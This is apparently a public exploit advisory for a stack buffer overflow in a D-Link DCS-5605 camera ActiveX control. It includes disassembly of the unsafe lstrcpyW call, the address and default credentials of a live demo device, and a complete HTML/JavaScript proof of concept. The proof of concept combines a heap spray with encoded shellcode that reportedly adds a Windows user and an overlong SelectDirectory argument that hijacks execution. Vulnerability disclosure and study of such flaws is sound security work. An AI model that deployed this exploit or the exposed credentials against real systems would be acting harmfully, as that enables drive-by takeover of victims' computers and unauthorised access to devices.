1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199 | D-Link SecuriCam DCS-5605 Network Surveillance ActiveX Control
DcsCliCtrl.dll lstrcpyW Remote Buffer Overflow Vulnerability
tested against: Microsoft Windows Server 2003 r2 sp2
Internet Explorer 7/8
Live demo: http://203.125.227.70/eng/index.cgi
username: dlink
password: dlink
product homepage: http://www.d-link.com/products/?pid=771
product description:
"The DCS-5605 is a high performance camera for professional surveillance
and remote monitoring. This network camera features motorized pan,
tilt, and optical/digital zoom for ultimate versatility. The 10x optical
zoom lens delivers the level of detail necessary to identify faces, license
plate numbers, and other important details that are difficult to
clearly distinguish using digital zoom alone"
background:
When browsing the device web interface, the user
is asked to install an ActiveX control to stream
video content. This control has the following settings:
Description: Camera Stream Client Control
File version: 1.0.0.4519
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
ProgID: DcsCliCtrl.DCSStrmControl.1
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
Implements IObjectSafety: Yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): True
Vulnerability:
the ActiveX control exposes the SelectDirectory()
method which supports one optional argument.
See typelib:
...
/* DISPID=22 */
/* VT_BSTR [8] */
function SelectDirectory(
/* VT_VARIANT [12] [in] */ $varDefPath
)
{
/* method SelectDirectory */
}
...
This method suffers of a stack based buffer overflow vulnerability
because an unsafe lstrcpyW() call inside DcsCliCtrl.dll:
...
100712E0 81EC 34040000 sub esp,434
100712E6 A1 2C841010 mov eax,dword ptr ds:[1010842C]
100712EB 33C4 xor eax,esp
100712ED 898424 30040000 mov dword ptr ss:[esp+430],eax
100712F4 53 push ebx
100712F5 8B9C24 48040000 mov ebx,dword ptr ss:[esp+448]
100712FC 55 push ebp
100712FD 8BAC24 40040000 mov ebp,dword ptr ss:[esp+440]
10071304 56 push esi
10071305 8BB424 4C040000 mov esi,dword ptr ss:[esp+44C]
1007130C 57 push edi
1007130D 8BBC24 4C040000 mov edi,dword ptr ss:[esp+44C]
10071314 68 08020000 push 208
10071319 8D4424 34 lea eax,dword ptr ss:[esp+34]
1007131D 6A 00 push 0
1007131F 50 push eax
10071320 E8 0BC40300 call DcsCliCt.100AD730
10071325 83C4 0C add esp,0C
10071328 85F6 test esi,esi
1007132A 74 0C je short DcsCliCt.10071338
1007132C 56 push esi
1007132D 8D4C24 34 lea ecx,dword ptr ss:[esp+34]
10071331 51 push ecx
10071332 FF15 D4D20C10 call dword ptr ds:[<&KERNEL32.lstrcpyW>] ; kernel32.lstrcpyW <-------------
...
An attacker could entice a remote user to browse a web
page to gain control of the victim browser, by passing an overlong string to
the mentioned method and overwriting critical structures (SEH).
As attachment proof of concept code.
Note, to reproduce the wanted crash:
when the SelectDirectory() method is called the
user is asked to select a destination folder for the stream recorder.
To set EIP to 0x0c0c0c0c select a folder of choice, then proceed.
When clicking Cancel you have an unuseful crash, however it could be
possible that modifying the poc you will have EIP overwritten aswell.
I think that it is also possible that other products might carry this dll,
I could post an update if I find more.
Additional note:
0:029> lm -vm DcsCliCtrl
start end module name
08450000 0859e000 DcsCliCtrl (deferred)
Image path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
Image name: DcsCliCtrl.dll
Timestamp: Thu Aug 19 08:48:47 2010 (4C6CD3CF)
CheckSum: 001325EC
ImageSize: 0014E000
File version: 1.0.0.4519
Product version: 1.0.0.1
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 2.0 Dll
File date: 00000000.00000000
Translations: 0409.04e4
ProductName: Camera Streaming Client
InternalName: DcsCliCtrl.dll
OriginalFilename: DcsCliCtrl.dll
ProductVersion: 1.0.0.1
FileVersion: 1.0.0.4519
FileDescription: Camera Stream Client Control
LegalCopyright: Copyright: (c) All rights reserved.
<!--
D-Link DCS-5605 Network Surveillance ActiveX Control DcsCliCtrl.dll
lstrcpyW Remote Buffer Overflow Vulnerability poc
(ie7)
Description: Camera Stream Client Control
File version: 1.0.0.4519
Binary path: C:\Program Files\NetworkSurveillanceAX\DcsCliCtrl.dll
ProgID: DcsCliCtrl.DCSStrmControl.1
GUID: {721700FE-7F0E-49C5-BDED-CA92B7CB1245}
Implements IObjectSafety: Yes
Safe For Scripting (IObjectSafety): True
Safe For Initialization (IObjectSafety): True
rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
please select a directory to download ...
<object classid='clsid:721700FE-7F0E-49C5-BDED-CA92B7CB1245' id='obj' width=0 height=0 />
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<666;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
var x = "";
for (i=0; i<200; i++){
x = x + unescape("%u4141%u4141");
}
for (i=0; i<700; i++){
x = x + unescape("%u0c0c%u0c0c");
}
obj.SelectDirectory(x);
</script>
|
